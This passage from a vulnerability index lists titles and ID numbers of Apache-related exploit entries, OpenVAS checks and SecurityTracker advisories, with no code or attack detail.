15396| [15319] Apache 2.2 (Windows) Local Denial of Service
15397| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
15398| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15399| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
15400| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
15401| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
15402| [12330] Apache OFBiz - Multiple XSS
15403| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
15404| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
15405| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
15406| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
15407| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
15408| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
15409| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
15410| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
15411| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15412| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
15413| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
15414| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
15415| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15416| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
15417| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
15418| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
15419| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
15420| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
15421| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
15422| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
15423| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
15424| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
15425| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
15426| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
15427| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
15428| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
15429| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
15430| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
15431| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
15432| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
15433| [466] htpasswd Apache 1.3.31 - Local Exploit
15434| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
15435| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
15436| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
15437| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
15438| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
15439| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
15440| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
15441| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
15442| [9] Apache HTTP Server 2.x Memory Leak Exploit
15443|
15444| OpenVAS (Nessus) - http://www.openvas.org:
15445| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
15446| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
15447| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
15448| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
15449| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
15450| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
15451| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
15452| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
15453| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
15454| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
15455| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
15456| [900571] Apache APR-Utils Version Detection
15457| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
15458| [900496] Apache Tiles Multiple XSS Vulnerability
15459| [900493] Apache Tiles Version Detection
15460| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
15461| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
15462| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
15463| [870175] RedHat Update for apache RHSA-2008:0004-01
15464| [864591] Fedora Update for apache-poi FEDORA-2012-10835
15465| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
15466| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
15467| [864250] Fedora Update for apache-poi FEDORA-2012-7683
15468| [864249] Fedora Update for apache-poi FEDORA-2012-7686
15469| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
15470| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
15471| [855821] Solaris Update for Apache 1.3 122912-19
15472| [855812] Solaris Update for Apache 1.3 122911-19
15473| [855737] Solaris Update for Apache 1.3 122911-17
15474| [855731] Solaris Update for Apache 1.3 122912-17
15475| [855695] Solaris Update for Apache 1.3 122911-16
15476| [855645] Solaris Update for Apache 1.3 122912-16
15477| [855587] Solaris Update for kernel update and Apache 108529-29
15478| [855566] Solaris Update for Apache 116973-07
15479| [855531] Solaris Update for Apache 116974-07
15480| [855524] Solaris Update for Apache 2 120544-14
15481| [855494] Solaris Update for Apache 1.3 122911-15
15482| [855478] Solaris Update for Apache Security 114145-11
15483| [855472] Solaris Update for Apache Security 113146-12
15484| [855179] Solaris Update for Apache 1.3 122912-15
15485| [855147] Solaris Update for kernel update and Apache 108528-29
15486| [855077] Solaris Update for Apache 2 120543-14
15487| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
15488| [850088] SuSE Update for apache2 SUSE-SA:2007:061
15489| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
15490| [841209] Ubuntu Update for apache2 USN-1627-1
15491| [840900] Ubuntu Update for apache2 USN-1368-1
15492| [840798] Ubuntu Update for apache2 USN-1259-1
15493| [840734] Ubuntu Update for apache2 USN-1199-1
15494| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
15495| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
15496| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
15497| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
15498| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
15499| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
15500| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
15501| [835253] HP-UX Update for Apache Web Server HPSBUX02645
15502| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
15503| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
15504| [835236] HP-UX Update for Apache with PHP HPSBUX02543
15505| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
15506| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
15507| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
15508| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
15509| [835188] HP-UX Update for Apache HPSBUX02308
15510| [835181] HP-UX Update for Apache With PHP HPSBUX02332
15511| [835180] HP-UX Update for Apache with PHP HPSBUX02342
15512| [835172] HP-UX Update for Apache HPSBUX02365
15513| [835168] HP-UX Update for Apache HPSBUX02313
15514| [835148] HP-UX Update for Apache HPSBUX01064
15515| [835139] HP-UX Update for Apache with PHP HPSBUX01090
15516| [835131] HP-UX Update for Apache HPSBUX00256
15517| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
15518| [835104] HP-UX Update for Apache HPSBUX00224
15519| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
15520| [835101] HP-UX Update for Apache HPSBUX01232
15521| [835080] HP-UX Update for Apache HPSBUX02273
15522| [835078] HP-UX Update for ApacheStrong HPSBUX00255
15523| [835044] HP-UX Update for Apache HPSBUX01019
15524| [835040] HP-UX Update for Apache PHP HPSBUX00207
15525| [835025] HP-UX Update for Apache HPSBUX00197
15526| [835023] HP-UX Update for Apache HPSBUX01022
15527| [835022] HP-UX Update for Apache HPSBUX02292
15528| [835005] HP-UX Update for Apache HPSBUX02262
15529| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
15530| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
15531| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
15532| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
15533| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
15534| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
15535| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
15536| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
15537| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
15538| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
15539| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
15540| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
15541| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
15542| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
15543| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
15544| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
15545| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
15546| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
15547| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
15548| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
15549| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
15550| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
15551| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
15552| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
15553| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
15554| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
15555| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
15556| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
15557| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
15558| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
15559| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
15560| [801942] Apache Archiva Multiple Vulnerabilities
15561| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
15562| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
15563| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
15564| [801284] Apache Derby Information Disclosure Vulnerability
15565| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
15566| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
15567| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
15568| [800680] Apache APR Version Detection
15569| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
15570| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
15571| [800677] Apache Roller Version Detection
15572| [800279] Apache mod_jk Module Version Detection
15573| [800278] Apache Struts Cross Site Scripting Vulnerability
15574| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
15575| [800276] Apache Struts Version Detection
15576| [800271] Apache Struts Directory Traversal Vulnerability
15577| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
15578| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
15579| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
15580| [103122] Apache Web Server ETag Header Information Disclosure Weakness
15581| [103074] Apache Continuum Cross Site Scripting Vulnerability
15582| [103073] Apache Continuum Detection
15583| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
15584| [101023] Apache Open For Business Weak Password security check
15585| [101020] Apache Open For Business HTML injection vulnerability
15586| [101019] Apache Open For Business service detection
15587| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
15588| [100923] Apache Archiva Detection
15589| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
15590| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
15591| [100813] Apache Axis2 Detection
15592| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
15593| [100795] Apache Derby Detection
15594| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
15595| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
15596| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
15597| [100514] Apache Multiple Security Vulnerabilities
15598| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
15599| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
15600| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
15601| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15602| [72626] Debian Security Advisory DSA 2579-1 (apache2)
15603| [72612] FreeBSD Ports: apache22
15604| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
15605| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
15606| [71512] FreeBSD Ports: apache
15607| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
15608| [71256] Debian Security Advisory DSA 2452-1 (apache2)
15609| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
15610| [70737] FreeBSD Ports: apache
15611| [70724] Debian Security Advisory DSA 2405-1 (apache2)
15612| [70600] FreeBSD Ports: apache
15613| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
15614| [70235] Debian Security Advisory DSA 2298-2 (apache2)
15615| [70233] Debian Security Advisory DSA 2298-1 (apache2)
15616| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
15617| [69338] Debian Security Advisory DSA 2202-1 (apache2)
15618| [67868] FreeBSD Ports: apache
15619| [66816] FreeBSD Ports: apache
15620| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
15621| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
15622| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
15623| [66081] SLES11: Security update for Apache 2
15624| [66074] SLES10: Security update for Apache 2
15625| [66070] SLES9: Security update for Apache 2
15626| [65998] SLES10: Security update for apache2-mod_python
15627| [65893] SLES10: Security update for Apache 2
15628| [65888] SLES10: Security update for Apache 2
15629| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
15630| [65510] SLES9: Security update for Apache 2
15631| [65472] SLES9: Security update for Apache
15632| [65467] SLES9: Security update for Apache
15633| [65450] SLES9: Security update for apache2
15634| [65390] SLES9: Security update for Apache2
15635| [65363] SLES9: Security update for Apache2
15636| [65309] SLES9: Security update for Apache and mod_ssl
15637| [65296] SLES9: Security update for webdav apache module
15638| [65283] SLES9: Security update for Apache2
15639| [65249] SLES9: Security update for Apache 2
15640| [65230] SLES9: Security update for Apache 2
15641| [65228] SLES9: Security update for Apache 2
15642| [65212] SLES9: Security update for apache2-mod_python
15643| [65209] SLES9: Security update for apache2-worker
15644| [65207] SLES9: Security update for Apache 2
15645| [65168] SLES9: Security update for apache2-mod_python
15646| [65142] SLES9: Security update for Apache2
15647| [65136] SLES9: Security update for Apache 2
15648| [65132] SLES9: Security update for apache
15649| [65131] SLES9: Security update for Apache 2 oes/CORE
15650| [65113] SLES9: Security update for apache2
15651| [65072] SLES9: Security update for apache and mod_ssl
15652| [65017] SLES9: Security update for Apache 2
15653| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
15654| [64783] FreeBSD Ports: apache
15655| [64774] Ubuntu USN-802-2 (apache2)
15656| [64653] Ubuntu USN-813-2 (apache2)
15657| [64559] Debian Security Advisory DSA 1834-2 (apache2)
15658| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
15659| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
15660| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
15661| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
15662| [64443] Ubuntu USN-802-1 (apache2)
15663| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
15664| [64423] Debian Security Advisory DSA 1834-1 (apache2)
15665| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
15666| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
15667| [64251] Debian Security Advisory DSA 1816-1 (apache2)
15668| [64201] Ubuntu USN-787-1 (apache2)
15669| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
15670| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
15671| [63565] FreeBSD Ports: apache
15672| [63562] Ubuntu USN-731-1 (apache2)
15673| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
15674| [61185] FreeBSD Ports: apache
15675| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
15676| [60387] Slackware Advisory SSA:2008-045-02 apache
15677| [58826] FreeBSD Ports: apache-tomcat
15678| [58825] FreeBSD Ports: apache-tomcat
15679| [58804] FreeBSD Ports: apache
15680| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
15681| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
15682| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
15683| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
15684| [57335] Debian Security Advisory DSA 1167-1 (apache)
15685| [57201] Debian Security Advisory DSA 1131-1 (apache)
15686| [57200] Debian Security Advisory DSA 1132-1 (apache2)
15687| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
15688| [57145] FreeBSD Ports: apache
15689| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
15690| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
15691| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
15692| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
15693| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
15694| [56067] FreeBSD Ports: apache
15695| [55803] Slackware Advisory SSA:2005-310-04 apache
15696| [55519] Debian Security Advisory DSA 839-1 (apachetop)
15697| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
15698| [55355] FreeBSD Ports: apache
15699| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
15700| [55261] Debian Security Advisory DSA 805-1 (apache2)
15701| [55259] Debian Security Advisory DSA 803-1 (apache)
15702| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
15703| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
15704| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
15705| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
15706| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
15707| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
15708| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
15709| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
15710| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
15711| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
15712| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
15713| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
15714| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
15715| [54439] FreeBSD Ports: apache
15716| [53931] Slackware Advisory SSA:2004-133-01 apache
15717| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
15718| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
15719| [53878] Slackware Advisory SSA:2003-308-01 apache security update
15720| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
15721| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
15722| [53848] Debian Security Advisory DSA 131-1 (apache)
15723| [53784] Debian Security Advisory DSA 021-1 (apache)
15724| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
15725| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
15726| [53735] Debian Security Advisory DSA 187-1 (apache)
15727| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
15728| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
15729| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
15730| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
15731| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
15732| [53282] Debian Security Advisory DSA 594-1 (apache)
15733| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
15734| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
15735| [53215] Debian Security Advisory DSA 525-1 (apache)
15736| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
15737| [52529] FreeBSD Ports: apache+ssl
15738| [52501] FreeBSD Ports: apache
15739| [52461] FreeBSD Ports: apache
15740| [52390] FreeBSD Ports: apache
15741| [52389] FreeBSD Ports: apache
15742| [52388] FreeBSD Ports: apache
15743| [52383] FreeBSD Ports: apache
15744| [52339] FreeBSD Ports: apache+mod_ssl
15745| [52331] FreeBSD Ports: apache
15746| [52329] FreeBSD Ports: ru-apache+mod_ssl
15747| [52314] FreeBSD Ports: apache
15748| [52310] FreeBSD Ports: apache
15749| [15588] Detect Apache HTTPS
15750| [15555] Apache mod_proxy content-length buffer overflow
15751| [15554] Apache mod_include priviledge escalation
15752| [14771] Apache <= 1.3.33 htpasswd local overflow
15753| [14177] Apache mod_access rule bypass
15754| [13644] Apache mod_rootme Backdoor
15755| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
15756| [12280] Apache Connection Blocking Denial of Service
15757| [12239] Apache Error Log Escape Sequence Injection
15758| [12123] Apache Tomcat source.jsp malformed request information disclosure
15759| [12085] Apache Tomcat servlet/JSP container default files
15760| [11438] Apache Tomcat Directory Listing and File disclosure
15761| [11204] Apache Tomcat Default Accounts
15762| [11092] Apache 2.0.39 Win32 directory traversal
15763| [11046] Apache Tomcat TroubleShooter Servlet Installed
15764| [11042] Apache Tomcat DOS Device Name XSS
15765| [11041] Apache Tomcat /servlet Cross Site Scripting
15766| [10938] Apache Remote Command Execution via .bat files
15767| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
15768| [10773] MacOS X Finder reveals contents of Apache Web files
15769| [10766] Apache UserDir Sensitive Information Disclosure
15770| [10756] MacOS X Finder reveals contents of Apache Web directories
15771| [10752] Apache Auth Module SQL Insertion Attack
15772| [10704] Apache Directory Listing
15773| [10678] Apache /server-info accessible
15774| [10677] Apache /server-status accessible
15775| [10440] Check for Apache Multiple / vulnerability
15776|
15777| SecurityTracker - https://www.securitytracker.com:
15778| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
15779| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
15780| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
15781| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
15782| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15783| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15784| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15785| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
15786| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
15787| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
15788| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15789| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
15790| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
15791| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
15792| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
15793| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
15794| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
15795| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
15796| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
15797| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
15798| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
15799| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
15800| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
15801| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15802| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
15803| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
15804| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15805| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
15806| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
15807| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
15808| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
15809| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
15810| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
15811| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
15812| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
15813| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
15814| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
15815| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
15816| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
15817| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
15818| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
15819| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
15820| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
15821| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
15822| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
15823| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
15824| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
15825| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
15826| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
15827| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
15828| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
15829| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
15830| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
15831| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
15832| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
15833| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
15834| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
15835| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
15836| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
15837| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
15838| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
15839| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
15840| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
15841| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
